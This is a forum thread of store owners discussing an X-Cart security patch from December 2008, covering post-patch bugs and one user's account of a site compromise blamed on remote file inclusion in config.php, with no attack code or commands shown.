|
Re: Security bulletin 2008-12-18
Wow, its nice to see that this patch "doesn't have any 'hidden' impacts. </sarcasm>
|
Re: Security bulletin 2008-12-18
I just follow the Jon method and i upgrade it without a problem, everything look like works well.
Cranko |
Re: Security bulletin 2008-12-18
Bah... after some testing i discover some huge errors...
First one now customer are unavailable to register, always say: --- - ERROR Please make sure you properly filled in all the required fields! --- But all fields are filled. Second ... when you login system redirect to a nonsecure http, this are unaceptable. So, no chance to apply the security patch, i just put a ticket and waiting for advice. So im still with my ass uncover... Dam upgrades, to complicated and always lots of problems. |
Re: Security bulletin 2008-12-18
Quote:
My new customers are registering without problems... I see that you are on 4.1.9 Did you apply the other security patches before applying this patch? From post #1 Quote:
|
Re: Security bulletin 2008-12-18
And the previous patches cause all sorts of issues as mentioned in other threads - this just keeps getting compounded with each additional patch. Quite a nightmare.
|
Re: Security bulletin 2008-12-18
Applied the patch - all seems well, except that now I get an error at the top of the checkout screen (where customers enter their personal info):
Warning: Invalid argument supplied for foreach() in /home/vacsew/public_html/cart.php on line 509 Not sure where to start... |
Re: Security bulletin 2008-12-18
Just a note. I'm using 4.1.8 and am patched "up to date".
Yesterday and this morning we received a malicious attack. Hacker gained access via config.php and was able to use my server to send spam to 100,000's of people. He also uploaded files in the images folder, defaced the store front and removed the pricing file, replacing it with another file. Needless to say, this is very disappointing, especially since the newest patch was applied on the 18th. We have taken extraordinary measures to take care of the hole and remove the files but this should not have happened... I have never been hacked before and find it odd that it happened within 24 hours or so after the patch. |
Re: Security bulletin 2008-12-18
Did the hacker get in via X-Cart or via FTP? Were your files and folders set to the correct permissions? Were your provider/ and admin/ directories password protected? Security patches only patch the software flaws, they don't secure the server and system for you - so you need to find out where the breach happened first.
|
Re: Security bulletin 2008-12-18
Yes, through xcart. Not via FTP. Yes, permissions were all set properly on those files. Yes, admin directory is password protected.
I have [REMOVED by request of person mentioned in thread] managing all the patches on a regular basis. The breach happened from a hacker using a script he called through the config file. [edit] - sorry. I just wanted you to see what we are dealing with....in spite of the patch. I do go out of my way to secure my server/software....its not something I take lightly. According to my system admin (not [REMOVED by request of person mentioned in thread], but my managed service team for my servers who also manage the security).... "The config file is vulnerable to remote file inclusion and XSS. This allows the attacker to basically do anything unprivileged (not as root)." |
Re: Security bulletin 2008-12-18
Well don't post it! :( What was the permission set to on config.php?
|
| All times are GMT -8. The time now is 05:37 AM. |
Powered by vBulletin Version 3.5.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.